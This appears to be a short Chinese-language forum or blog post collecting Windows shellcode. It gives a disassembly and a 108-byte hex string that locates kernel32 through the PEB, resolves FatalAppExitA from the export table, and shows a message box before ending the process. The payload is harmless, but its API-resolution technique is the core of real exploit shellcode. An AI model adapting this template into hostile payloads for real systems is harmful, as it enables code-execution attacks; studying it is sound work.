shellcode搜集

好像WINDOWS版本都行的   利用 FatalAppExit  函数 弹出对话框 然后结束  shellcode串很短

00406032    B2 30           mov dl,0x30
00406034    64:8B12         mov edx,dword ptr fs:[edx]
00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; _PEB_LDR_DATA
0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; InInitializationOrderModuleList 第一项
0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; InMemoryOrderLinks
00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; FullDllName
00406043    8B12            mov edx,dword ptr ds:[edx]                 ; InInitializationOrderModuleList 第二项
00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33
00406049  ^ 75 F2           jnz XlastTest.0040603D
0040604B    89C7            mov edi,eax
0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; pe
00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; 导出表
00406053    01C2            add edx,eax
00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; ENT
00406058    01C7            add edi,eax
0040605A    31ED            xor ebp,ebp
0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]
0040605F    01C6            add esi,eax
00406061    45              inc ebp
00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; CMP NAME 0-3
00406068  ^ 75 F2           jnz XlastTest.0040605C
0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; 8-11
00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; FatalAppExit 函数显示一个消息框，并终止应用程序时，消息框关闭
00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; 导出***数组
00406076    01C7            add edi,eax
00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; 得到***
0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; EAT
0040607F    01C7            add edi,eax
00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; 得到函数地址
00406085    01C7            add edi,eax                                ; get the address of FatalAppExiA
00406087    68 64614001     push 0x1406164
0040608C    68 4070616E     push 0x6E617040
00406096    89E1            mov ecx,esp
00406098    FE49 07         dec byte ptr ds:[ecx+0x7]
0040609B    31C0            xor eax,eax
0040609D    51              push ecx
0040609E    50              push eax
0040609F    FFD7            call edi

"\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B"
"\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20"
"\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E"
"\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01"
"\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE"
"\x49\x07\x31\xC0\x51\x50\xFF\xD7"
//108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3